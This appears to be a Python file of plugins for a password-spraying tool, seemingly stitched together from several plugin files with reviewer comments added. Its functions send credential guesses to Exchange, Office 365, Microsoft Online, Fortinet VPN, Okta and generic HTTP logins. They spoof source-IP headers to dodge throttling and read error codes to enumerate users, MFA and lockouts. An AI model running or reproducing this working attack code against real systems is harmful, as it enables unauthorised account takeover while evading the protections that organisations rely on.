def testconnect(pluginargs, args, api_dict, useragent):
    """Check that the proxy endpoint answers, then record the host's domain.

    A single GET is sent to ``api_dict['proxy_url']``. HTTP 504 is reported
    as a failed connection. For any other status, ``get_owa_domain`` is
    called for ``/autodiscover/autodiscover.xml``; its result is stored in
    ``pluginargs['domain']`` and interpolated into the status message.

    Returns:
        Tuple ``(success, output, pluginargs)``.
    """
    proxy_url = api_dict['proxy_url']
    probe_headers = {
        'User-Agent': useragent,
        "X-My-X-Forwarded-For": generate_ip(),
        "x-amzn-apigateway-api-id": generate_id(),
        "X-My-X-Amzn-Trace-Id": generate_trace_id(),
    }

    # NOTE(review): verify=False disables TLS certificate validation and no
    # timeout is passed, so the peer is not authenticated and a stalled
    # endpoint blocks this call.
    resp = requests.get(proxy_url, headers=probe_headers, verify=False)

    if resp.status_code == 504:
        timeout_msg = "Testconnect: Connection failed, endpoint timed out, exiting"
        return False, timeout_msg, pluginargs

    # Only reached when the endpoint answered with something other than 504.
    domainname = get_owa_domain(proxy_url, "/autodiscover/autodiscover.xml", useragent)
    pluginargs['domain'] = domainname
    output = "Testconnect: Fingerprinting host... Internal Domain name: {domain}, continuing".format(
        domain=domainname)
    return True, output, pluginargs
def ews_authenticate(url, username, password, useragent, pluginargs):
    """Attempt one NTLM-authenticated POST to ``{url}/ews/`` and report it.

    Returns the plugin result dict. ``success`` is True for every HTTP status
    except 401; ``error`` is True when the request raised, in which case
    ``output`` holds the exception object itself.

    NOTE(review): the result dict and its ``output`` string carry the
    cleartext password, so anything that stores or prints these results
    holds credentials and needs to be protected accordingly.
    """
    data_response = {
        'timestamp': datetime.datetime.utcnow().strftime('%Y-%m-%d %H:%M:%S'),
        'username': username,
        'password': password,
        'success': False,
        'change': False,
        '2fa_enabled': False,
        'type': None,
        'code': None,
        'name': None,
        'action': None,
        'headers': [],
        'cookies': [],
        'sourceip': None,
        'throttled': False,
        'error': False,
        'output': "",
    }

    # Per-request generated header values (same generation order as before).
    request_headers = {
        'User-Agent': useragent,
        "X-My-X-Forwarded-For": generate_ip(),
        "x-amzn-apigateway-api-id": generate_id(),
        "X-My-X-Amzn-Trace-Id": generate_trace_id(),
        "Content-Type": "text/xml",
    }

    try:
        # NOTE(review): verify=False disables TLS certificate validation.
        resp = requests.post(
            "{}/ews/".format(url),
            headers=request_headers,
            auth=HttpNtlmAuth(username, password),
            verify=False,
        )

        # NOTE(review): only 401 counts as a rejection. Any other status
        # (403, 404, 5xx, ...) is recorded as found credentials, so the
        # status code embedded in the output has to be checked before a
        # result is trusted.
        rejected = resp.status_code == 401
        data_response['success'] = not rejected
        if rejected:
            data_response['output'] = (
                f"[-] Authentication failed: {username}:{password} (Invalid credentials)")
        else:
            data_response['output'] = (
                f"[+] Found credentials, code: {resp.status_code}: {username}:{password}")
    except Exception as ex:
        # Broad catch: any failure is reported through the result dict.
        data_response['error'] = True
        data_response['output'] = ex

    return data_response
def testconnect(pluginargs, args, api_dict, useragent):
    """Send one GET to ``api_dict['proxy_url']`` and report reachability.

    HTTP 504 is treated as a failed connection; every other status is
    reported as a successful connection.

    Returns:
        Tuple ``(success, output, pluginargs)``; ``pluginargs`` is returned
        unchanged.
    """
    probe_headers = {
        'User-Agent': useragent,
        "X-My-X-Forwarded-For": generate_ip(),
        "x-amzn-apigateway-api-id": generate_id(),
        "X-My-X-Amzn-Trace-Id": generate_trace_id(),
    }

    # NOTE(review): no timeout is passed, so a stalled endpoint blocks here.
    resp = requests.get(api_dict['proxy_url'], headers=probe_headers)

    timed_out = resp.status_code == 504
    if timed_out:
        output = "Testconnect: Connection failed, endpoint timed out, exiting"
    else:
        output = "Testconnect: Connection success, continuting"
    return (not timed_out), output, pluginargs
def testconnect(pluginargs, args, api_dict, useragent):
    """Fetch ``/remote/login?lang=en`` through the proxy and report the result.

    HTTP 504 is reported as a failed connection. Otherwise the call succeeds,
    and the message depends on whether the substring ``fortinet`` occurs in
    the response body.

    Returns:
        Tuple ``(success, output, pluginargs)``; ``pluginargs`` is returned
        unchanged.
    """
    probe_headers = {
        'User-Agent': useragent,
        "X-My-X-Forwarded-For": generate_ip(),
        "x-amzn-apigateway-api-id": generate_id(),
        "X-My-X-Amzn-Trace-Id": generate_trace_id(),
    }
    login_page = api_dict['proxy_url'] + "/remote/login?lang=en"

    # NOTE(review): no timeout is passed, so a stalled endpoint blocks here.
    resp = requests.get(login_page, headers=probe_headers)

    if resp.status_code == 504:
        return False, "Testconnect: Connection failed, endpoint timed out, exiting", pluginargs

    # The substring match is case-sensitive and is the only product check.
    if "fortinet" in resp.text:
        return True, "Testconnect: Verified Fortinet instance, connected", pluginargs

    return True, "Testconnect: Warning, Fortinet client not indicated, continuting", pluginargs
def msol_authenticate(url, username, password, useragent, pluginargs):
    """POST one password-grant token request to ``{url}/common/oauth2/token``.

    HTTP 200 is recorded as a success. For any other status the JSON body's
    ``error_description`` is searched for AADSTS codes, which decide the
    ``success``, ``2fa_enabled``, ``change`` and ``output`` fields.

    Returns the plugin result dict. ``error`` is True when anything raised
    (request failure, non-JSON body, missing ``error_description``), in which
    case ``output`` holds the exception object itself.

    NOTE(review): the result dict and several ``output`` strings carry the
    cleartext password; treat stored results as credential material.
    """
    data_response = {
        'timestamp': datetime.datetime.utcnow().strftime('%Y-%m-%d %H:%M:%S'),
        'username': username,
        'password': password,
        'success': False,
        'change': False,
        '2fa_enabled': False,
        'type': None,
        'code': None,
        'name': None,
        'action': None,
        'headers': [],
        'cookies': [],
        'sourceip': None,
        'throttled': False,
        'error': False,
        'output': "",
    }

    form_fields = {
        'resource': 'https://graph.windows.net',
        'client_id': '1b730954-1685-4b74-9bfd-dac224a7b894',
        'client_info': '1',
        'grant_type': 'password',
        'username': username,
        'password': password,
        'scope': 'openid',
    }

    # Per-request generated header values (same generation order as before).
    request_headers = {
        "X-My-X-Forwarded-For": generate_ip(),
        "x-amzn-apigateway-api-id": generate_id(),
        "X-My-X-Amzn-Trace-Id": generate_trace_id(),
        "User-Agent": useragent,
        'Accept': 'application/json',
        'Content-Type': 'application/x-www-form-urlencoded',
    }

    try:
        # NOTE(review): no timeout is passed, so a stalled endpoint blocks here.
        resp = requests.post(
            "{}/common/oauth2/token".format(url),
            headers=request_headers,
            data=form_fields,
        )
        status = resp.status_code
        data_response['code'] = status

        if status == 200:
            data_response['success'] = True
            data_response['output'] = f"SUCCESS! {status} {username}:{password}"
        else:
            error = resp.json()["error_description"]

            def mentions(*codes):
                # True when any of the given AADSTS codes occurs in the text.
                return any(code in error for code in codes)

            # The checks below run in the same order as the original chain;
            # 'success' is already False unless a branch sets it.
            if mentions("AADSTS50126"):
                data_response['output'] = (
                    f"FAILED. {status} Invalid username or password. "
                    f"Username: {username} could exist.")
            elif mentions("AADSTS50128", "AADSTS50059"):
                data_response['output'] = (
                    f"FAILED. {status} Tenant for account {username} "
                    f"is not using AzureAD/Office365")
            elif mentions("AADSTS50034"):
                data_response['output'] = f"FAILED. {status} The user {username} doesn't exist."
            elif mentions("AADSTS50079", "AADSTS50076"):
                # Microsoft MFA response.
                data_response['2fa_enabled'] = True
                data_response['success'] = True
                data_response['code'] = "2FA Microsoft"
                data_response['output'] = (
                    f"SUCCESS! {status} {username}:{password} - NOTE: "
                    f"The response indicates MFA (Microsoft) is in use.")
            elif mentions("AADSTS50158"):
                # Conditional Access response; per the original author's
                # limited testing this appears to be the DUO MFA reply.
                data_response['2fa_enabled'] = True
                data_response['success'] = True
                data_response['code'] = "2FA Other"
                data_response['output'] = (
                    f"SUCCESS! {status} {username}:{password} - NOTE: "
                    f"The response indicates conditional access (MFA: DUO or other) is in use.")
            elif mentions("AADSTS50053"):
                # Locked-out account or Smart Lockout in place.
                data_response['output'] = (
                    f"WARNING! {status} The account {username} appears to be locked.")
            elif mentions("AADSTS50055"):
                # The user's password is expired.
                data_response['change'] = True
                data_response['success'] = True
                data_response['output'] = (
                    f"SUCCESS! {status} {username}:{password} - NOTE: "
                    f"The user's password is expired.")
            else:
                # Error text that matches none of the known codes.
                data_response['output'] = (
                    f"FAILED. {status} Got an error we haven't seen yet for user {username}")
    except Exception as ex:
        # Broad catch: any failure is reported through the result dict.
        data_response['error'] = True
        data_response['output'] = ex

    return data_response
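def template_authenticate(url, username, password, useragent, pluginargs):
    """Skeleton for a new plugin's ``<name>_authenticate`` function.

    Builds the common result dict, sends one POST to ``{url}/uri`` and fills
    in the result from the placeholder conditions below.

    Returns the plugin result dict. ``error`` is True when anything raised,
    in which case ``output`` holds the exception object itself.

    NOTE(review): the result dict and its ``output`` strings carry the
    cleartext password; treat stored results as credential material.
    """
    # CHANGEME: replace template with plugin name
    ts = datetime.datetime.utcnow().strftime('%Y-%m-%d %H:%M:%S')

    # Not all of these are used; they are provided for future development.
    # The only ones that must be returned at the moment are:
    #   error
    #   output
    #   success
    data_response = {
        'timestamp': ts,
        'username': username,
        'password': password,
        'success': False,
        'change': False,
        '2fa_enabled': False,
        'type': None,
        'code': None,
        'name': None,
        'action': None,
        'headers': [],
        'cookies': [],
        'sourceip': None,
        'throttled': False,
        'error': False,
        'output': ""
    }

    spoofed_ip = generate_ip()
    amazon_id = generate_id()
    trace_id = generate_trace_id()

    # CHANGEME: Add more if necessary
    headers = {
        'User-Agent': useragent,
        "X-My-X-Forwarded-For": spoofed_ip,
        "x-amzn-apigateway-api-id": amazon_id,
        "X-My-X-Amzn-Trace-Id": trace_id,
    }

    try:
        resp = requests.post("{}/uri".format(url), headers=headers)

        # Success, Success_but_2fa and lockout_or_pwd_expired_or_other are
        # placeholders that this block does not define. Until they are
        # replaced with real conditions the lookup raises and the except
        # branch below reports an error.
        if Success:
            data_response['success'] = True
            data_response['output'] = 'SUCCESS_MESSAGE: => {}:{}'.format(
                username, password)

        elif Success_but_2fa:
            data_response['success'] = True
            data_response['output'] = 'SUCCESS_2FA_MESSAGE: => {}:{}'.format(
                username, password)
            data_response['2fa_enabled'] = True

        elif lockout_or_pwd_expired_or_other:
            data_response['success'] = False
            data_response['output'] = 'ISSUE_MESSAGE: {} => {}:{}'.format(
                resp.status_code, username, password)

        else:  # fail
            # A plain failure says nothing about MFA, so '2fa_enabled' keeps
            # its default of False. The template used to set it to True here.
            data_response['success'] = False
            data_response['output'] = 'FAILURE_MESSAGE: {} => {}:{}'.format(
                resp.status_code, username, password)

    except Exception as ex:
        # Broad catch: any failure is reported through the result dict.
        data_response['error'] = True
        data_response['output'] = ex

    return data_response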
def fortinetvpn_authenticate(url, username, password, useragent, pluginargs):
    """POST one form login to ``{url}/remote/logincheck`` and report it.

    The attempt counts as a success only when the status is 200 and the body
    contains both ``redir=`` and ``&portal=``. When ``pluginargs`` has a
    ``domain`` entry it is sent as the ``realm`` field and appended to the
    success message.

    Returns the plugin result dict. ``error`` is True when the request
    raised, in which case ``output`` holds the exception object itself.

    NOTE(review): the result dict and its ``output`` strings carry the
    cleartext password; treat stored results as credential material.
    """
    data_response = {
        'timestamp': datetime.datetime.utcnow().strftime('%Y-%m-%d %H:%M:%S'),
        'username': username,
        'password': password,
        'success': False,
        'change': False,
        '2fa_enabled': False,
        'type': None,
        'code': None,
        'name': None,
        'action': None,
        'headers': [],
        'cookies': [],
        'sourceip': None,
        'throttled': False,
        'error': False,
        'output': "",
    }

    # Per-request generated header values (same generation order as before).
    request_headers = {
        'User-Agent': useragent,
        "X-My-X-Forwarded-For": generate_ip(),
        "x-amzn-apigateway-api-id": generate_id(),
        "X-My-X-Amzn-Trace-Id": generate_trace_id(),
        'Content-Type': 'application/x-www-form-urlencoded',
    }

    has_domain = 'domain' in pluginargs.keys()
    post_params = {
        "ajax": '1',
        'username': username,
        'credential': password,
        'realm': pluginargs['domain'] if has_domain else '',
    }

    try:
        # NOTE(review): no timeout is passed, so a stalled endpoint blocks here.
        resp = requests.post(
            "{}/remote/logincheck".format(url),
            data=post_params,
            headers=request_headers,
        )

        body = resp.text if resp.status_code == 200 else None
        logged_in = body is not None and 'redir=' in body and '&portal=' in body

        data_response['success'] = logged_in
        if logged_in:
            message = 'SUCCESS: => {}:{}'.format(username, password)
            if has_domain:
                message = message + " Domain: {}".format(pluginargs['domain'])
            data_response['output'] = message
        else:
            data_response['output'] = 'FAILURE: {} => {}:{}'.format(
                resp.status_code, username, password)
    except Exception as ex:
        # Broad catch: any failure is reported through the result dict.
        data_response['error'] = True
        data_response['output'] = ex

    return data_response
def o365_authenticate(url, username, password, useragent, pluginargs):
    """GET ``{url}/autodiscover/autodiscover.xml`` with basic auth and report it.

    Status 200 is recorded as a success, 456 as a success flagged
    "2FA or Locked", and every other status as a failure.

    Returns the plugin result dict. ``error`` is True when the request
    raised, in which case ``output`` holds the exception object itself.

    NOTE(review): the result dict and its ``output`` strings carry the
    cleartext password; treat stored results as credential material.
    """
    data_response = {
        'timestamp': datetime.datetime.utcnow().strftime('%Y-%m-%d %H:%M:%S'),
        'username': username,
        'password': password,
        'success': False,
        'change': False,
        '2fa_enabled': False,
        'type': None,
        'code': None,
        'name': None,
        'action': None,
        'headers': [],
        'cookies': [],
        'sourceip': None,
        'throttled': False,
        'error': False,
        'output': "",
    }

    # Per-request generated header values (same generation order as before).
    request_headers = {
        'User-Agent': useragent,
        "X-My-X-Forwarded-For": generate_ip(),
        "x-amzn-apigateway-api-id": generate_id(),
        "X-My-X-Amzn-Trace-Id": generate_trace_id(),
        "Content-Type": "text/xml",
    }

    try:
        # NOTE(review): verify=False disables TLS certificate validation.
        r = requests.get(
            "{}/autodiscover/autodiscover.xml".format(url),
            auth=(username, password),
            headers=request_headers,
            verify=False,
            timeout=30,
        )

        status = r.status_code
        if status == 200:
            template, accepted = "SUCCESS: {username}:{password}", True
        elif status == 456:
            # 456 is reported as a hit although the account may be locked
            # or behind a second factor.
            template, accepted = "SUCCESS: {username}:{password} - 2FA or Locked", True
        else:
            template, accepted = "FAILED: {username}:{password}", False

        data_response['output'] = template.format(username=username, password=password)
        data_response['success'] = accepted
    except Exception as ex:
        # Broad catch: any failure is reported through the result dict.
        data_response['error'] = True
        data_response['output'] = ex

    return data_response
def get(self, *_args, **_kwargs):
    """Reply through ``self.success`` with a newly generated id.

    The positional and keyword arguments are accepted and ignored. The id
    comes from ``generate_id()`` and is sent under the ``generate_id`` key.
    """
    payload = {"generate_id": generate_id()}
    self.success(data=payload)
def httpbrute_authenticate(url, username, password, useragent, pluginargs):
    """GET ``{url}/{pluginargs['uri']}`` with HTTP auth and report the result.

    ``pluginargs['auth']`` selects the scheme: ``basic``, ``digest``, or NTLM
    for any other value. Status 200 is a success, 401 a failure, and every
    other status is reported as an unknown response code.

    Returns the plugin result dict. ``error`` is True when anything inside
    the try block raised (including a missing ``uri`` or ``auth`` key), in
    which case ``output`` holds the exception object itself.

    NOTE(review): the result dict and its ``output`` strings carry the
    cleartext password; treat stored results as credential material.
    """
    data_response = {
        'timestamp': datetime.datetime.utcnow().strftime('%Y-%m-%d %H:%M:%S'),
        'username': username,
        'password': password,
        'success': False,
        'change': False,
        '2fa_enabled': False,
        'type': None,
        'code': None,
        'name': None,
        'action': None,
        'headers': [],
        'cookies': [],
        'sourceip': None,
        'throttled': False,
        'error': False,
        'output': "",
    }

    # NOTE(review): this dict is built but none of the requests below
    # receives it, so `useragent` and the generated values are not sent and
    # the requests go out with the HTTP library's default headers.
    headers = {
        'User-Agent': useragent,
        "X-My-X-Forwarded-For": generate_ip(),
        "x-amzn-apigateway-api-id": generate_id(),
        "X-My-X-Amzn-Trace-Id": generate_trace_id(),
    }

    try:
        full_url = "{}/{}".format(url, pluginargs['uri'])

        scheme = pluginargs['auth']
        if scheme == 'basic':
            auth_factory = requests.auth.HTTPBasicAuth
        elif scheme == 'digest':
            auth_factory = requests.auth.HTTPDigestAuth
        else:
            # Any other value falls through to NTLM.
            auth_factory = requests_ntlm.HttpNtlmAuth

        # NOTE(review): verify=False disables TLS certificate validation.
        resp = requests.get(
            url=full_url,
            auth=auth_factory(username, password),
            verify=False,
            timeout=30,
        )

        status = resp.status_code
        data_response['success'] = status == 200
        if status == 200:
            data_response['output'] = 'SUCCESS: => {}:{}'.format(username, password)
        elif status == 401:
            data_response['output'] = 'FAILURE: => {}:{}'.format(username, password)
        else:
            data_response['output'] = 'UNKNOWN_RESPONSE_CODE: {} => {}:{}'.format(
                status, username, password)
    except Exception as ex:
        # Broad catch: any failure is reported through the result dict.
        data_response['error'] = True
        data_response['output'] = ex

    return data_response
def okta_authenticate(url, username, password, useragent, pluginargs):
    """POST one login to ``{url}/api/v1/authn/`` and classify the answer.

    On HTTP 200 the JSON ``status`` field decides the outcome (LOCKED_OUT,
    SUCCESS, MFA_REQUIRED, PASSWORD_EXPIRED, anything else). A 403 is
    reported as a throttling indication, any other status as a failure.

    Returns the plugin result dict. ``error`` is True when anything raised,
    in which case ``output`` holds the exception object itself.

    NOTE(review): the result dict and its ``output`` strings carry the
    cleartext password; treat stored results as credential material.
    """
    data_response = {
        'timestamp': datetime.datetime.utcnow().strftime('%Y-%m-%d %H:%M:%S'),
        'username': username,
        'password': password,
        'success': False,
        'change': False,
        '2fa_enabled': False,
        'type': None,
        'code': None,
        'name': None,
        'action': None,
        'headers': [],
        'cookies': [],
        'sourceip': None,
        'throttled': False,
        'error': False,
        'output': "",
    }

    # NOTE(review): the body is assembled with % interpolation rather than a
    # JSON encoder, so a quote or backslash in either value is not escaped
    # and the request body is then not valid JSON.
    raw_body = (
        '{"username":"%s","password":"%s","options":'
        '{"warnBeforePasswordExpired":true,"multiOptionalFactorEnroll":true}}'
    ) % (username, password)

    # Per-request generated header values (same generation order as before).
    request_headers = {
        'User-Agent': useragent,
        "X-My-X-Forwarded-For": generate_ip(),
        "x-amzn-apigateway-api-id": generate_id(),
        "X-My-X-Amzn-Trace-Id": generate_trace_id(),
        'Content-Type': 'application/json',
    }

    try:
        # NOTE(review): no timeout is passed, so a stalled endpoint blocks here.
        resp = requests.post(
            "{}/api/v1/authn/".format(url),
            data=raw_body,
            headers=request_headers,
        )

        if resp.status_code == 200:
            state = json.loads(resp.text).get("status")

            if state == "LOCKED_OUT":
                # Warning from the original author: administrators can
                # configure Okta not to indicate that an account is locked
                # out, so the absence of this status proves nothing.
                data_response['output'] = 'FAILED: Locked out {}:{}'.format(
                    username, password)
                data_response['action'] = 'redirect'
            elif state == "SUCCESS":
                data_response['success'] = True
                data_response['output'] = 'SUCCESS: => {}:{}'.format(
                    username, password)
            elif state == "MFA_REQUIRED":
                data_response['2fa_enabled'] = True
                data_response['success'] = True
                data_response['output'] = "SUCCESS: 2FA => {}:{}".format(
                    username, password)
            elif state == "PASSWORD_EXPIRED":
                data_response['change'] = True
                data_response['success'] = True
                data_response['output'] = "SUCCESS: password expired {}:{}".format(
                    username, password)
            else:
                data_response['output'] = (
                    "ALERT: 200 but doesn't indicate success {}:{}".format(
                        username, password))
        else:
            # Non-200: record the status; 403 gets the throttling message.
            data_response['code'] = resp.status_code
            if resp.status_code == 403:
                template = "FAILED THROTTLE INDICATED: {} => {}:{}"
            else:
                template = "FAILED: {} => {}:{}"
            data_response['output'] = template.format(
                resp.status_code, username, password)
    except Exception as ex:
        # Broad catch: any failure is reported through the result dict.
        data_response['error'] = True
        data_response['output'] = ex

    return data_response